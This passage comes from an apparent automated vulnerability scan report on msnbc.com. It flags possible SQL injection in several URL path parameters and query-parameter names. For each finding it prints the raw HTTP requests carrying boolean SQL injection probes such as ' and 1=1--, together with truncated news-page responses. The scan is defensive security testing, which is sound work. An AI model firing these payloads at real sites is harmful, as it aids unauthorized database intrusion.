<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/37643077" />
<link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets2a.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1a.msnbc.redacted/re
...[SNIP]...

Request 2

GET /id/37643077?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111117


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:490236434 -->
<title>Welcome to our new story pages - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/37643077" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets4b.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1b.msnbc.redacted/rend
...[SNIP]...

1.111. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41164445/ns/world_news-africa/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41164445'%20and%201%3d1--%20/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60741


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41239631/ns/world_news-africa/" title="View next story">
6 dead in religion-torn central Nigerian region
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-image entry-content ">

<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg">
<div class="img"
rel="media:image enclosure" type="image/jpeg">
<img src="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg" width="474" height="316" alt="A Tunisian riot policeman searches through belongings of protesters after security forces stormed a protest camp in Tunis" class="photo"
...[SNIP]...

Request 2

GET /id/41164445'%20and%201%3d2--%20/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60404


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41324863/ns/world_news-africa/" title="View next story">
Soldiers shoot at university students in Nigeria
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-image entry-content ">

<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg">
<div class="img"
rel="media:image enclosure" type="image/jpeg">
<img src="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg" width="474" height="316" alt="A Tunisian riot policeman searches through belongings of protesters after security forces stormed a protest camp in Tunis" class="photo"
...[SNIP]...

1.112. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41164445/ns/world_news-africa/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41164445/ns/world_news-africa'%20and%201%3d1--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60561


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:129150930 -->
<title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Upda
...[SNIP]...

Request 2

GET /id/41164445/ns/world_news-africa'%20and%201%3d2--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60651


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847512 -->
<title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Up
...[SNIP]...

1.113. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41164445/ns/world_news-africa/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41164445/ns/world_news-africa/?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60561


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:485381290 -->
<title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Upda
...[SNIP]...

Request 2

GET /id/41164445/ns/world_news-africa/?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Up
...[SNIP]...

1.114. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10493613'%20or%201%3d1--%20 and 10493613'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41323843/ns10493613'%20or%201%3d1--%20/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 02:03:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
n police and protesters seeking to drive President Hosni Mubarak from power.","dateline":"CAIRO","components":{"survey":null,"slices":[{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847499","ItemIndex":0},{"videos":[{"launch":41328231,"plt":3,"plc":22422632,"settings":37785941,"settingsOverride":3032619,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328233,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328238,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41325063,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328237,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847499","ItemIndex":0},{"bridge":[{"workbenchId":41294535,"headline":"Egyptians take to the streets","totalSlides":66,"firstSlide":{"headline":"","caption":"Anti-government protesters hold a sign in English reading \"Game Over Mubark\" and another in Arabic reading, \"You go out, because you damage Egyptian dignity,\" in Tahrir Square in Cairo, Egypt, Saturday, Jan. 29.&#160;(Ben Curtis&#160;/&#160;AP)","src":"http://msnbcmedia4.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110129-egypt-24.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2","templateName":"Below"},"tease":null,"typeName":"SlideshowSlide","RenderAuthority":"-1075847499","ItemIndex":0},"lastSlide":{"headline":"","caption":"Tear gas smoke fired by Egyptian police is seen as demonstrators gather in central Cairo on Jan. 
25.&#160;(Mohammed Abed&#160;/&#160;AFP - Getty Images)","src":"http://msnbcmedia2.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110127-egypt-unrest-15.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2"
...[SNIP]...

Request 2

GET /id/41323843/ns10493613'%20or%201%3d2--%20/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 02:03:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
n police and protesters seeking to drive President Hosni Mubarak from power.","dateline":"CAIRO","components":{"survey":null,"slices":[{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"videos":[{"launch":41328231,"plt":3,"plc":22422632,"settings":37785941,"settingsOverride":3032619,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328233,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328238,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41325063,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328237,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"bridge":[{"workbenchId":41294535,"headline":"Egyptians take to the streets","totalSlides":66,"firstSlide":{"headline":"","caption":"Anti-government protesters hold a sign in English reading \"Game Over Mubark\" and another in Arabic reading, \"You go out, because you damage Egyptian dignity,\" in Tahrir Square in Cairo, Egypt, Saturday, Jan. 29.&#160;(Ben Curtis&#160;/&#160;AP)","src":"http://msnbcmedia4.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110129-egypt-24.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2","templateName":"Below"},"tease":null,"typeName":"SlideshowSlide","RenderAuthority":"-1075847510","ItemIndex":0},"lastSlide":{"headline":"","caption":"Tear gas smoke fired by Egyptian police is seen as demonstrators gather in central Cairo on Jan. 
25.&#160;(Mohammed Abed&#160;/&#160;AFP - Getty Images)","src":"http://msnbcmedia2.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110127-egypt-unrest-15.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2"
...[SNIP]...

1.115. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 25334761'%20or%201%3d1--%20 and 25334761'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

